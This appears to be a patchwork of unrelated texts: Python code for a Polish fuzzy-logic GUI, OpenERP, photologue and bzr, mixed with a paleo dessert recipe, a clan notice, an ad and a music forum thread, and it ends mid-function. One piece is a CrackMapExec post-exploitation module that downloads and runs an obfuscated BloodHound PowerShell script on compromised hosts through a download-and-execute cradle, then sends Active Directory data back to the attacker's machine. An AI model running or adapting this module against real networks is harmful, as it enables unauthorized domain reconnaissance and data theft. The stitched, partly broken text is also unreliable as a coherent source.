tkinter.Label(bottom,text="Funkcja do edycji:").grid(column=0,row=0) tkinter.OptionMenu(bottom,self.fuzzyName,*self.fuzzyNameList).grid(column=0,row=1) tkinter.Label(bottom,text="Kształt funkcji").grid(column=1,row=0) tkinter.OptionMenu(bottom,self.fuzzyType,*self.fuzzyTypeList).grid(column=1,row=1) tkinter.Label(bottom,text="Wartości punktów").grid(column=2,row=0,columnspan=5) for i in range(0,len(self.values)): tkinter.Entry(bottom, textvariable=self.values[i], width=5).grid(column=2+i,row=1) b=tkinter.Button(bottom, text="Odśwież", command= lambda: self.onButtonFPrzynaleznosciOdswierz(dom, self.fuzzyName.get(), self.fuzzyType.get(), self.values)) b.grid(column=7,row=1) def refresh(self): return self.show(self.frame, self.dom) def onButtonFPrzynaleznosciOdswierz(self, dom, fuzzyName, fuzzyType, values): val = [] for i in range(0, len(values)): try: val.append( float(values[i].get()) ) except ValueError: print("Bad input") return old_set = dom.get_set(fuzzyName) if fuzzyType == 'trójkątna': f_set = fuzzy_sets.TriangleSet(old_set.range_min, val[0], val[1], val[2], old_set.range_max, old_set.name) if fuzzyType == 'prostokątna': f_set = fuzzy_sets.RectangleSet(old_set.range_min, val[0], val[1], old_set.range_max, old_set.name) if fuzzyType == 'trapezowa': f_set = fuzzy_sets.TrapezoidSet(old_set.range_min, val[0], val[1], val[2], val[3], old_set.range_max, old_set.name) if fuzzyType == 'Guassa': f_set = fuzzy_sets.GaussSet(old_set.range_min, val[0], val[1], old_set.range_max, old_set.name) dom.change_set(fuzzyName, f_set) self.refresh() class guiOnButtonPlaszczyznaSterowan(tkinter.Tk): def __init__(self, parent): self.parent = parent def show(self, frame): frame.update() top = Frame(frame, width = frame.winfo_width(), height = frame.winfo_height()-50) top.pack(side=TOP, fill=BOTH) top.pack_propagate(False) bottom = Frame(frame, width = frame.winfo_width(), height = 50) bottom.pack(side=BOTTOM, fill=Y) bottom.pack_propagate(False) ## tkinter.Label(bottom, text='Przyczepność: ').pack(side=LEFT) tmp = self.parent.dom_przyczepnosc.fuzzy_sets[0] scale = tkinter.Scale(bottom, from_=tmp.range_min, to=tmp.range_max, resolution=(tmp.range_max-tmp.range_min)/500, orient=HORIZONTAL) scale.pack(fill=X, expand=True, side=LEFT) tkinter.Button(bottom, text='Rysuj', command= lambda: self.refreshPlot(top, scale.get())).pack(side=LEFT) ## l=tkinter.Label(top, text=( "Aby narysować wykres,\n" "ustaw parametr przyczepność i wciśnij przycisk 'Rysuj'\n" "\n" "Generacja wykresu może trochę potrwać!\n")) l.pack(fill=BOTH, expand=True, anchor=CENTER) def refreshPlot(self, frame, przyczepnosc): # draw 3d graph of 2 rule input 1 rule output num_gridpoints = 25 vels = np.linspace(self.parent.dom_predkosc.fuzzy_sets[0].range_min, self.parent.dom_predkosc.fuzzy_sets[0].range_max, num_gridpoints) viss = np.linspace(self.parent.dom_widocznosc.fuzzy_sets[0].range_min, self.parent.dom_widocznosc.fuzzy_sets[0].range_max, num_gridpoints) vels, viss = np.meshgrid(vels, viss) risks = np.ones((num_gridpoints, num_gridpoints)) inference = self.parent.ruleset.inference for x in range(num_gridpoints): for y in range(num_gridpoints): risks[x, y] = inference([vels[x][y], viss[x][y], przyczepnosc]) fig = plt.figure(figsize=(15,15), dpi=60) fig.canvas.set_window_title('Wykres 3D dla przyczepności = '+'%.2f'%przyczepnosc) ax = fig.add_subplot(111,projection="3d") ax.set_xlabel("Prędkość [km/h]") ax.set_ylabel("Widoczność [km]") ax.set_zlabel("Prawdopodobieństwo wypadku [%]") ax.set_zlim([self.parent.dom_ryzyko.fuzzy_sets[0].range_min, 
self.parent.dom_ryzyko.fuzzy_sets[0].range_max]); ax.plot_surface(vels, viss, risks, rstride=1, cstride=1, cmap=cm.coolwarm) fig.show() plt.show() #~ self.parent.resetFrame(frame) #~ canvas = FigureCanvasTkAgg(fig, frame) #~ toolbar = NavigationToolbar2TkAgg(canvas, frame) #~ toolbar.pack(side=TOP, fill=BOTH) #~ canvas.get_tk_widget().pack(side=BOTTOM, fill=BOTH) class guiOnButtonGeneratorLiczb(): def __init__(self,parent): self.parent = parent; self.predkosc = StringVar(); self.widocznosc = StringVar(); self.przyczepnosc = StringVar(); self.ryzyko = StringVar(); self.debug = StringVar(); def show(self, inframe): frame = tkinter.Frame(inframe); frame.place(in_=inframe, anchor="c", relx=.5, rely=.5); tkinter.Label(frame,text="Wyznacz wyjście dla wejść:\n").grid(column=0, row=0, columnspan=2) tkinter.Label(frame,text="Prędkość ").grid(column=0, row=1) tkinter.Entry(frame, textvariable=self.predkosc).grid(column=1, row=1) tkinter.Label(frame,text="Widoczność ").grid(column=0, row=2) tkinter.Entry(frame, textvariable=self.widocznosc).grid(column=1, row=2) tkinter.Label(frame,text="Przyczepność ").grid(column=0, row=3) tkinter.Entry(frame, textvariable=self.przyczepnosc).grid(column=1, row=3) tkinter.Label(frame,text="Prawdopodobieństwo wypadku ").grid(column=0, row=4) tkinter.Entry(frame, textvariable=self.ryzyko).grid(column=1, row=4) tkinter.Label(frame,text="\n").grid(column=0, row=5) b=tkinter.Button(frame, text="Wygeneruj losowe wartości", command=self.onButtonWygeneruj) b.grid(column=0, row=6) b=tkinter.Button(frame,text="Wyznacz", command=self.onButtonWyznacz) b.grid(column=1, row=6) tkinter.Label(frame,textvariable=self.debug).grid(column=0, row=8,columnspan=2) def myRandrange(self, fuzzy_set): return round(fuzzy_set.range_min+random.random()*fuzzy_set.range_max, 3); def onButtonWygeneruj(self): fuzzy_set = self.parent.dom_predkosc.fuzzy_sets[0]; self.predkosc.set( self.myRandrange(fuzzy_set) ); fuzzy_set = self.parent.dom_widocznosc.fuzzy_sets[0]; self.widocznosc.set( self.myRandrange(fuzzy_set) ); fuzzy_set = self.parent.dom_przyczepnosc.fuzzy_sets[0]; self.przyczepnosc.set( self.myRandrange(fuzzy_set) ); self.ryzyko.set(""); def onButtonWyznacz(self): try: pre = float(self.predkosc.get()); fuzzy_set = self.parent.dom_predkosc.fuzzy_sets[0]; if pre < fuzzy_set.range_min or pre > fuzzy_set.range_max: raise ValueError; except ValueError: self.debug.set('Zla wartosc predkości.'); return try: wid = float(self.widocznosc.get()); fuzzy_set = self.parent.dom_widocznosc.fuzzy_sets[0]; if wid < fuzzy_set.range_min or wid > fuzzy_set.range_max: raise ValueError; except ValueError: self.debug.set('Zla wartosc widoczności.'); return try: prz = float(self.przyczepnosc.get()); fuzzy_set = self.parent.dom_przyczepnosc.fuzzy_sets[0]; if prz < fuzzy_set.range_min or prz > fuzzy_set.range_max: raise ValueError; except ValueError: self.debug.set('Zla wartosc przyczepności.'); return self.ryzyko.set( self.parent.ruleset.inference( [pre, wid, prz ] ) ); class gui(tkinter.Tk): width=700 height=600 def __init__(self,parent,fuzzy_system): tkinter.Tk.__init__(self,parent) [dom_predkosc, dom_widocznosc, dom_przyczepnosc, dom_ryzyko, ruleset] = fuzzy_system self.dom_predkosc = dom_predkosc self.dom_widocznosc = dom_widocznosc self.dom_przyczepnosc = dom_przyczepnosc self.dom_ryzyko = dom_ryzyko self.ruleset = ruleset self.parent = parent self.guiOnButtonFPrzynaleznosci = guiOnButtonFPrzynaleznosci(self) self.guiOnButtonReguly = guiOnButtonReguly(self) self.guiOnButtonPlaszczyznaSterowan = 
guiOnButtonPlaszczyznaSterowan(self) self.guiOnButtonDefuzyfikacja = guiOnButtonDefuzyfikacja(self) self.guiOnButtonGeneratorLiczb = guiOnButtonGeneratorLiczb(self) self.initialize() def initialize(self): self.geometry('{}x{}'.format(self.width, self.height)) self.lf = Frame(self, bg = "light gray", width = 100, height = self.height) self.lf.pack(side=LEFT, fill=Y, padx=1, pady=1) self.initLeftFrame(self.lf) self.rf = Frame(self, bg = "light gray", width = (self.width-100), height = self.height) self.rf.pack(side=RIGHT, anchor=CENTER, expand=True, fill=BOTH, padx=3, pady=3) quote=("Program zaliczeniowy na przedmiot PSZT.\n" "\n\n\n\n\n" "Wykonali: Kamila Cipior, Kamil Cukrowski, Michał Kostrzewa\n" "Prowadząca: p. Joanna Panasiuk \n" "Rok wykonania projektu: 2016\n") l=tkinter.Label(self.rf,text=quote, justify=RIGHT, font=("Helvetica", 14)) l.pack(fill=BOTH, expand=True, anchor=CENTER) def initLeftFrame(self,lf): tkinter.Label(lf,text="\nMenu:\n\n-- Funkcje przynależności --").pack(fill=X) tkinter.Button(lf,text="prędkość", command= lambda: self.onButtonFPrzynaleznosci(self.dom_predkosc)).pack(fill=X) tkinter.Button(lf,text="widoczność", command= lambda: self.onButtonFPrzynaleznosci(self.dom_widocznosc)).pack(fill=X) tkinter.Button(lf,text="przyczepność", command= lambda: self.onButtonFPrzynaleznosci(self.dom_przyczepnosc)).pack(fill=X) tkinter.Button(lf,text="ryzyko", command= lambda: self.onButtonFPrzynaleznosci(self.dom_ryzyko)).pack(fill=X) tkinter.Label(lf,text="\n").pack(fill=X) tkinter.Label(lf,text="-- Reguły --").pack(fill=X) tkinter.Button(lf,text="Wyświetl", command=self.OnButtonReguly).pack(fill=X) tkinter.Button(lf,text="Defuzyfikacja", command=self.OnButtonDefuzyfikacja).pack(fill=X) tkinter.Label(lf,text="\n").pack(fill=X) tkinter.Label(lf,text="-- Wyostrzanie --").pack(fill=X) tkinter.Button(lf,text="Wyostrzanie liczb", command=self.OnButtonGeneratorLiczb).pack(fill=X) tkinter.Button(lf,text="Wykres 3D", command=self.OnButtonPlaszczyznaSterowan).pack(fill=X) tkinter.Label(lf,text="\n").pack(fill=X) def OnButtonDefuzyfikacja(self): self.resetFrame(self.rf) self.guiOnButtonDefuzyfikacja.show(self.rf) def OnButtonPlaszczyznaSterowan(self): self.resetFrame(self.rf) self.guiOnButtonPlaszczyznaSterowan.show(self.rf) def resetFrame(self,frame): for widget in frame.winfo_children(): widget.destroy() def OnButtonReguly(self): self.resetFrame(self.rf) self.guiOnButtonReguly.show(self.rf) def onButtonFPrzynaleznosci(self,dom): self.resetFrame(self.rf) self.guiOnButtonFPrzynaleznosci.show(self.rf, dom) def on_resize(self,event): self.resetFrame(self.rf) def OnButtonGeneratorLiczb(self): self.resetFrame(self.rf) self.guiOnButtonGeneratorLiczb.show(self.rf)
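The two convert*() helpers in guiOnButtonDefuzyfikacja are mirror images of the same mapping; if the list of defuzzification methods ever grows, one table can drive both directions. A hedged sketch follows (the inference.cog/mom/lom/fom functions come from the module's own imports; the helper names are illustrative only):

```python
import inference

# one table instead of two if/elif ladders
DEFUZZIFIERS = {
    'COG': inference.cog,
    'MOM': inference.mom,
    'LOM': inference.lom,
    'FOM': inference.fom,
}

def text_to_inference_func(text):
    try:
        return DEFUZZIFIERS[text]
    except KeyError:
        raise ValueError('unknown inference function: ' + text)

def inference_func_to_text(func):
    for name, f in DEFUZZIFIERS.items():
        if f is func:
            return name
    raise ValueError('unknown inference function: %r' % (func,))
```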
Well, I have been experimenting in the kitchen again and discovered this blissful strawberry dish with Paleo whipped cream. Strawberries are fairly low in sugar and when it is combined with the fat from the coconut it produces a recipe that will have minimal negative impact on blood sugar, adrenals, neurotransmitters and insulin, which makes it a great occasional treat for those overcoming sugar addiction, candida overgrowth, adrenal fatigue, depression, anxiety or any other neurotransmitter or autonomic nervous system condition, as well as being friendly for not promoting insulin resistance or type 2 diabetes. Put a can of coconut milk in the fridge at least overnight, but longer is better. I give it several days. Chill a stainless steel bowl in the freezer for a half hour. Take can of coconut milk out of fridge. Do not shake the can because you do not want to mix the fat back in with the liquid. You will see that the fat has risen to the top when you open it. Scoop the fat out and leave the liquid in the can. Mix with mixer for about 2 or 3 minutes. Until it looks like whipped cream. Stir in vanilla and stevia with a fork or mix again for another 30 seconds or so. If you use fresh strawberries, stick them in the freezer for a half hour to chill them prior to making whipped cream. If you use frozen strawberries, then let them thaw until soft, but still cold. Place whipped cream on top of strawberries and nuts. This recipe could be done with blueberries, or any other fruit you like. I tried blueberries as well, but I liked the strawberries best. I was amazed at how delicious, creamy and similar the coconut cream is to dairy. You can see in the image below that it looks just like real whipped cream. This dish is a very satiating dessert. If you are having a craving for a carb it will really hit the spot. Believe me, you will not walk away from the dinner table feeling the least bit hungry. Of course, you can serve the Paleo Whipped Cream on any other dish that calls for whipped cream. *My idea to whip coconut into a cream was spurred from a recipe I found at www.againstthegrain.com and from the Paleo Diet Cookbook, but I added the vanilla and stevia. What brand of Stevia do you recommend? Looks great – can’t wait to try. Thanks so much for posting and all you do! You’re welcome, Loretta. I use NOW organic stevia powder.
from cme.helpers.powershell import * from cme.helpers.misc import validate_ntlm from cme.helpers.logger import write_log from sys import exit class CMEModule: ''' Executes the BloodHound recon script on the target and retreives the results onto the attackers' machine 2 supported modes : CSV : exports data into CSVs on the target file system before retreiving them (NOT opsec safe) Neo4j API : exports data directly to the Neo4j API (opsec safe) Module by Waffle-Wrath Bloodhound.ps1 script base : https://github.com/BloodHoundAD/BloodHound ''' name = 'bloodhound' description = 'Executes the BloodHound recon script on the target and retreives the results to the attackers\' machine' supported_protocols = ['smb'] opsec_safe= False multiple_hosts = False def options(self, context, module_options): ''' THREADS Max numbers of threads to execute on target (defaults to 20) COLLECTIONMETHOD Method used by BloodHound ingestor to collect data (defaults to 'Default') CSVPATH (optional) Path where csv files will be written on target (defaults to C:\) NEO4JURI (optional) URI for direct Neo4j ingestion (defaults to blank) NEO4JUSER (optional) Username for direct Neo4j ingestion NEO4JPASS (optional) Pass for direct Neo4j ingestion Give NEO4J options to perform direct Neo4j ingestion (no CSVs on target) ''' self.threads = 3 self.csv_path = 'C:\\' self.collection_method = 'Default' self.neo4j_URI = "" self.neo4j_user = "" self.neo4j_pass = "" if module_options and 'THREADS' in module_options: self.threads = module_options['THREADS'] if module_options and 'CSVPATH' in module_options: self.csv_path = module_options['CSVPATH'] if module_options and 'COLLECTIONMETHOD' in module_options: self.collection_method = module_options['COLLECTIONMETHOD'] if module_options and 'NEO4JURI' in module_options: self.neo4j_URI = module_options['NEO4JURI'] if module_options and 'NEO4JUSER' in module_options: self.neo4j_user = module_options['NEO4JUSER'] if module_options and 'NEO4JPASS' in module_options: self.neo4j_pass = module_options['NEO4JPASS'] if self.neo4j_URI != "" and self.neo4j_user != "" and self.neo4j_pass != "" : self.opsec_safe= True self.ps_script = obfs_ps_script('BloodHound-modified.ps1') def on_admin_login(self, context, connection): if self.neo4j_URI == "" and self.neo4j_user == "" and self.neo4j_pass == "" : command = "Invoke-BloodHound -CSVFolder '{}' -Throttle '{}' -CollectionMethod '{}'".format(self.csv_path, self.threads, self.collection_method) else : command = 'Invoke-BloodHound -URI {} -UserPass "{}:{}" -Throttle {} -CollectionMethod {}'.format(self.neo4j_URI, self.neo4j_user, self.neo4j_pass, self.threads, self.collection_method) launcher = gen_ps_iex_cradle(context, 'BloodHound-modified.ps1', command) connection.ps_execute(launcher) context.log.success('Executed launcher') def on_request(self, context, request): if 'BloodHound-modified.ps1' == request.path[1:]: request.send_response(200) request.end_headers() request.wfile.write(self.ps_script.encode()) context.log.success('Executing payload... 
this can take a few minutes...') else: request.send_response(404) request.end_headers() def on_response(self, context, response): response.send_response(200) response.end_headers() length = int(response.headers.get('content-length')) data = response.rfile.read(length).decode() response.stop_tracking_host() if self.neo4j_URI == "" and self.neo4j_user == "" and self.neo4j_pass == "" : self.parse_ouput(data, context, response) context.log.success("Successfully retreived data") def parse_ouput(self, data, context, response): ''' Parse the output from Invoke-BloodHound ''' parsedData = data.split("!-!") nameList = ['user_sessions', 'group_membership.csv', 'acls.csv', 'local_admins.csv', 'trusts.csv'] for x in range(0, len(parsedData)): if "ComputerName" in parsedData[x] and "UserName" in parsedData[x] : log_name = '{}-{}-{}.csv'.format(nameList[0], response.client_address[0], datetime.now().strftime("%Y-%m-%d_%H%M%S")) write_log(parsedData[x].replace('" "', '"\n"').replace(' "', '"'), log_name) context.log.info("Saved csv output to {}".format(log_name)) elif "GroupName" in parsedData[x] and "AccountName" in parsedData[x] : log_name = '{}-{}-{}.csv'.format(nameList[1], response.client_address[0], datetime.now().strftime("%Y-%m-%d_%H%M%S")) write_log(parsedData[x].replace('" "', '"\n"').replace(' "', '"'), log_name) context.log.info("Saved csv output to {}".format(log_name)) elif "ComputerName" in parsedData[x] and "AccountName" in parsedData[x] : log_name = '{}-{}-{}.csv'.format(nameList[3], response.client_address[0], datetime.now().strftime("%Y-%m-%d_%H%M%S")) write_log(parsedData[x].replace('" "', '"\n"').replace(' "', '"'), log_name) context.log.info("Saved csv output to {}".format(log_name)) elif "SourceDomain" in parsedData[x] and "TrustType" in parsedData[x] : log_name = '{}-{}-{}.csv'.format(nameList[4], response.client_address[0], datetime.now().strftime("%Y-%m-%d_%H%M%S")) write_log(parsedData[x].replace('" "', '"\n"').replace(' "', '"'), log_name) context.log.info("Saved csv output to {}".format(log_name)) elif "ObjectName" in parsedData[x] and "ObjectType" in parsedData[x] : log_name = '{}-{}-{}.csv'.format(nameList[2], response.client_address[0], datetime.now().strftime("%Y-%m-%d_%H%M%S")) write_log(parsedData[x].replace('" "', '"\n"').replace(' "', '"'), log_name) context.log.info("Saved csv output to {}".format(log_name))
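The elif ladder in parse_ouput() identifies each '!-!'-delimited chunk by sniffing a pair of CSV header fields. The same dispatch can be written as an ordered table; this is only a sketch of the idea, not part of the module (order matters, since sessions and local admins both mention ComputerName):

```python
# ordered (header fields, csv basename) pairs, mirroring the elif ladder above
SECTION_MARKERS = [
    (('ComputerName', 'UserName'),    'user_sessions'),
    (('GroupName',    'AccountName'), 'group_membership'),
    (('ComputerName', 'AccountName'), 'local_admins'),
    (('SourceDomain', 'TrustType'),   'trusts'),
    (('ObjectName',   'ObjectType'),  'acls'),
]

def classify_section(section):
    """Return the csv basename for one chunk of Invoke-BloodHound output, or None."""
    for fields, name in SECTION_MARKERS:
        if all(field in section for field in fields):
            return name
    return None
```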
The Dixon Clan were represented at the Clans of Ireland AGM at the Mansion House in Dublin in April 2013 by Ceann Fine Donal Dixon of Castleknock. This clan organisation traces its pedigree back to Edward Dixon of Meath, who was born in 1516. Through marriage the Dixons of Meath are also related to the Barons Louth, Barons of Galtrim and Earls of Fingal. One of the family’s ancestors, the Rt. Hon. Francis Agard, is buried alongside his daughter, Lady Cecily Harrington, at Christchurch Cathedral in Dublin. The family are also related by marriage to the Hussey family, Barons of Galtrim, who came to Ireland with Strongbow in the reign of Henry II. The Dixon Clan are in the process of writing up their rich history and pedigrees before officially launching the website. They are also in the process of joining the Dixon DNA project. The Dixons are a sept of Clan Keith in Scotland. The current Chief of Clan Keith is James William Falconer Keith, 14th Earl of Kintore.
# -*- encoding: utf-8 -*- ############################################################################## # # OpenERP, Open Source Management Solution # Copyright (C) 2004-2010 Tiny SPRL (http://tiny.be). All Rights Reserved # # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program. If not, see http://www.gnu.org/licenses/. # ############################################################################## from osv import osv from osv import fields # ### HEREDO LA PRODUCTOS PARA AÑADIRLE CAMPOS NUEVOS # class product_category(osv.osv): _name = 'product.category' _inherit = 'product.category' _columns = {'provision_type': fields.selection([('product','Stockable Product'),('consu', 'Consumable'),('service','Service')], 'Product Type', required=True, help="Will change the way procurements are processed. Consumable are product where you don't manage stock."), 'procure_method': fields.selection([('make_to_stock','Make to Stock'),('make_to_order','Make to Order')], 'Procurement Method', required=True, help="'Make to Stock': When needed, take from the stock or wait until re-supplying. 'Make to Order': When needed, purchase or produce for the procurement request."), 'supply_method': fields.selection([('produce','Produce'),('buy','Buy')], 'Supply method', required=True, help="Produce will generate production order or tasks, according to the product type. Buy will trigger purchase orders when requested."), } product_category()
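Selection columns added this way are usually paired with defaults so newly created categories get a sensible value. A hedged companion sketch in the same OpenERP 6.x osv style follows; the chosen default values are assumptions, not taken from the module:

```python
from osv import osv

class product_category_defaults(osv.osv):
    """Companion extension adding defaults for the new selection fields."""
    _inherit = 'product.category'

    _defaults = {
        'provision_type': lambda *a: 'product',        # illustrative choices only
        'procure_method': lambda *a: 'make_to_stock',
        'supply_method': lambda *a: 'buy',
    }

product_category_defaults()
```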
way down to self-installation marquees for schools or clubs on a tight budget. Give us a call today to discuss your requirements for your upcoming event; our team will have a solution for you. *Discounts apply for large order quantities, contact us today!
import subprocess import os import polib import copy import codecs def prereleaser_middle(data): """ 1. Run the unit tests one last time before we make a release. 2. Update the CONTRIBUTORS.txt file. Note: Install polib (https://pypi.python.org/pypi/polib). """ print('Running unit tests.') subprocess.check_output(["python", "example_project/manage.py", "test", "photologue"]) print('Running PEP8 check.') # See setup.cfg for configuration options. subprocess.check_output(["pep8"]) print('Updating CONTRIBUTORS.txt') # This command will get the author of every commit. output = subprocess.check_output(["git", "log", "--format='%aN'"]) # Convert to a list. contributors_list = [unicode(contributor.strip("'"), 'utf-8') for contributor in output.split("\n")] # Now add info from the translator files. This is incomplete, we can only list # the 'last contributor' to each translation. for language in os.listdir('photologue/locale/'): filename = 'photologue/locale/{0}/LC_MESSAGES/django.po'.format(language) po = polib.pofile(filename) last_translator = po.metadata['Last-Translator'] contributors_list.append(last_translator[:last_translator.find('<') - 1]) # Now we want to only show each contributor once, and to list them by how many # contributions they have made - a rough guide to the effort they have put in. contributors_dict = {} for author in contributors_list: author_copy = copy.copy(author) if author_copy in ('', '(no author)', 'FULL NAME'): # Skip bad data. continue # The creator of this project should always appear first in the list - so # don't add him to this list, but hard-code his name. if author_copy in ('Justin Driscoll', 'justin.driscoll'): continue # Handle contributors who appear under multiple names. if author_copy == 'richardbarran': author_copy = 'Richard Barran' if author_copy in contributors_dict: contributors_dict[author_copy] += 1 else: contributors_dict[author_copy] = 1 with codecs.open('CONTRIBUTORS.txt', 'w', encoding='utf8') as f: f.write('Photologue is made possible by all the people who have contributed' ' to it. A non-exhaustive list follows:\n\n') f.write('Justin Driscoll\n') for i in sorted(contributors_dict, key=contributors_dict.get, reverse=True): f.write(i + '\n')
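The manual dictionary counting and sorting at the end of prereleaser_middle() can also be expressed with collections.Counter; a small equivalent sketch (the helper name is illustrative):

```python
from collections import Counter

def rank_contributors(names, skip=('', '(no author)', 'FULL NAME')):
    """Count contributions per author and return the names, most active first."""
    counts = Counter(name for name in names if name not in skip)
    return [name for name, _ in counts.most_common()]

print(rank_contributors(['Alice', 'Bob', 'Alice', '(no author)']))
# ['Alice', 'Bob']
```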
I was quite happy with the beat I made for last week's track and didn't feel like I was quite done with it yet, so I pinched it for this week's track and modified the pattern a little bit. The bass is 3 Massive synths layered over each other. The annoying melodic synth is Massive too. I must say I am quite partial to slidey mono synths. The pad sound is my Gaia.

[quote=laguna]Quite jolly fun beat here! The chilly pad was lovely. And what about that name? :)[/quote] ;)

[quote=Devieus]It feels a bit like a deconstructed version.[/quote] It is deconstructed in that there's not much construction to it, I think!

[quote=Jim Wood]Well, it's my type. Happiness slithers in with the lead synth. ::)[/quote] Heh thanks fam!

Late listen. This is perfect for a workout session.
#!/usr/bin/env python # -*- encoding: utf-8 -*- # Copyright (C) 2007-2009 Guillermo Gonzalez # # The code taken from bzrlib is under: Copyright (C) 2005-2007 Canonical Ltd # # This program is free software; you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation; either version 2 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program; if not, write to the Free Software # Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA # # Contributors: # Martin Albisetti """This code is a modified copy from bzrlib.info (see there for copyrights and licensing) """ __all__ = ['show_bzrdir_info_xml'] from bzrlib import info from bzrlib.lazy_import import lazy_import lazy_import(globals(), """ import os, sys, time from bzrlib import ( bzrdir, diff, errors, osutils, urlutils, missing, ) """) from bzrlib.errors import (NoWorkingTree, NotBranchError, NoRepositoryPresent, NotLocalUrl) def get_lines_xml(self): """Returns the locations lines as xml.""" return ["<%s>%s</%s>" % (l.replace(' ', '_'), u, l.replace(' ', '_')) \ for l, u in self.locs ] info.LocationList.get_lines_xml = get_lines_xml def show_bzrdir_info_xml(a_bzrdir, verbose=False, outfile=None): """Output to stdout the 'info' for a_bzrdir.""" if outfile is None: outfile = sys.stdout try: tree = a_bzrdir.open_workingtree( recommend_upgrade=False) except (NoWorkingTree, NotLocalUrl): tree = None try: branch = a_bzrdir.open_branch() except NotBranchError: branch = None try: repository = a_bzrdir.open_repository() except NoRepositoryPresent: # Return silently; cmd_info already returned NotBranchError # if no bzrdir could be opened. 
return else: lockable = repository else: repository = branch.repository lockable = branch else: branch = tree.branch repository = branch.repository lockable = tree lockable.lock_read() try: outfile.write('<?xml version="1.0"?>') outfile.write('<info>') show_component_info_xml(a_bzrdir, repository, branch, tree, verbose, outfile) outfile.write('</info>') finally: lockable.unlock() def show_component_info_xml(control, repository, branch=None, working=None, verbose=1, outfile=None): """Write info about all bzrdir components to stdout""" if outfile is None: outfile = sys.stdout if verbose is False: verbose = 1 if verbose is True: verbose = 2 layout = info.describe_layout(repository, branch, working, control) formats = info.describe_format(control, repository, branch, working).split(' or ') outfile.write('<layout>%s</layout>' % layout) outfile.write('<formats>') if len(formats) > 1: for format in formats: outfile.write('<format>%s</format>' % format) else: outfile.write('<format>%s</format>' % formats[0]) outfile.write('</formats>') _show_location_info_xml(info.gather_location_info(repository, branch, working), outfile) if branch is not None: _show_related_info_xml(branch, outfile) if verbose == 0: return _show_format_info_xml(control, repository, branch, working, outfile) _show_locking_info_xml(repository, branch, working, outfile) if branch is not None: _show_missing_revisions_branch_xml(branch, outfile) if working is not None: _show_working_stats_xml(working, outfile) elif branch is not None: _show_missing_revisions_branch_xml(branch, outfile) if branch is not None: stats = _show_branch_stats_xml(branch, verbose==2, outfile) else: stats = repository.gather_stats() if branch is None and working is None: _show_repository_info_xml(repository, outfile) _show_repository_stats_xml(stats, outfile) def _show_location_info_xml(locs, outfile): """Show known locations for working, branch and repository.""" outfile.write('<location>') path_list = info.LocationList(osutils.getcwd()) for name, loc in locs: path_list.add_url(name, loc) outfile.writelines(path_list.get_lines_xml()) outfile.write('</location>') def _show_related_info_xml(branch, outfile): """Show parent and push location of branch.""" locs = info._gather_related_branches(branch) if len(locs.locs) > 0: outfile.write('<related_branches>') outfile.writelines(locs.get_lines_xml()) outfile.write('</related_branches>') def _show_format_info_xml(control=None, repository=None, branch=None, working=None, outfile=None): """Show known formats for control, working, branch and repository.""" outfile.write('<format>') if control: outfile.write('<control>%s</control>' % control._format.get_format_description()) if working: outfile.write('<working_tree>%s</working_tree>' % working._format.get_format_description()) if branch: outfile.write('<branch>%s</branch>' % branch._format.get_format_description()) if repository: outfile.write('<repository>%s</repository>' % repository._format.get_format_description()) outfile.write('</format>') def _show_locking_info_xml(repository, branch=None, working=None, outfile=None): """Show locking status of working, branch and repository.""" if (repository.get_physical_lock_status() or (branch and branch.get_physical_lock_status()) or (working and working.get_physical_lock_status())): outfile.write('<lock_status>') if working: if working.get_physical_lock_status(): status = 'locked' else: status = 'unlocked' outfile.write('<working_tree>%s</<working_tree>' % status) if branch: if branch.get_physical_lock_status(): status = 
'locked' else: status = 'unlocked' outfile.write('<branch>%s</branch>' % status) if repository: if repository.get_physical_lock_status(): status = 'locked' else: status = 'unlocked' outfile.write('<repository>%s</repository>' % status) outfile.write('</lock_status>') def _show_missing_revisions_branch_xml(branch, outfile): """Show missing master revisions in branch.""" # Try with inaccessible branch ? master = branch.get_master_branch() if master: local_extra, remote_extra = missing.find_unmerged(branch, master) if remote_extra: outfile.write('<branch_stats>') outfile.write('<missing_revisions>%d</missing_revisions>' % len(remote_extra)) outfile.write('</branch_stats>') def _show_missing_revisions_working_xml(working, outfile): """Show missing revisions in working tree.""" branch = working.branch basis = working.basis_tree() branch_revno, branch_last_revision = branch.last_revision_info() try: tree_last_id = working.get_parent_ids()[0] except IndexError: tree_last_id = None if branch_revno and tree_last_id != branch_last_revision: tree_last_revno = branch.revision_id_to_revno(tree_last_id) missing_count = branch_revno - tree_last_revno outfile.write('<missing_revisions>%d</missing_revisions>' % missing_count) def _show_working_stats_xml(working, outfile): """Show statistics about a working tree.""" basis = working.basis_tree() delta = working.changes_from(basis, want_unchanged=True) outfile.write('<working_tree_stats>') _show_missing_revisions_working_xml(working, outfile) outfile.write('<unchanged>%s</unchanged>' % len(delta.unchanged)) outfile.write('<modified>%d</modified>' % len(delta.modified)) outfile.write('<added>%d</added>' % len(delta.added)) outfile.write('<removed>%d</removed>' % len(delta.removed)) outfile.write('<renamed>%d</renamed>' % len(delta.renamed)) ignore_cnt = unknown_cnt = 0 for path in working.extras(): if working.is_ignored(path): ignore_cnt += 1 else: unknown_cnt += 1 outfile.write('<unknown>%d</unknown>' % unknown_cnt) outfile.write('<ignored>%d</ignored>' % ignore_cnt) dir_cnt = 0 for path, entry in working.iter_entries_by_dir(): if entry.kind == 'directory' and entry.parent_id is not None: dir_cnt += 1 outfile.write('<versioned_subdirectories>%d</versioned_subdirectories>' % (dir_cnt)) outfile.write('</working_tree_stats>') def _show_branch_stats_xml(branch, verbose, outfile): """Show statistics about a branch.""" revno, head = branch.last_revision_info() outfile.write('<branch_history>') outfile.write('<revisions>%d</revisions>' % (revno)) stats = branch.repository.gather_stats(head, committers=verbose) if verbose: committers = stats['committers'] outfile.write('<committers>%d</committers>' % (committers)) if revno: timestamp, timezone = stats['firstrev'] age = int((time.time() - timestamp) / 3600 / 24) outfile.write('<days_old>%d</days_old>' % (age)) 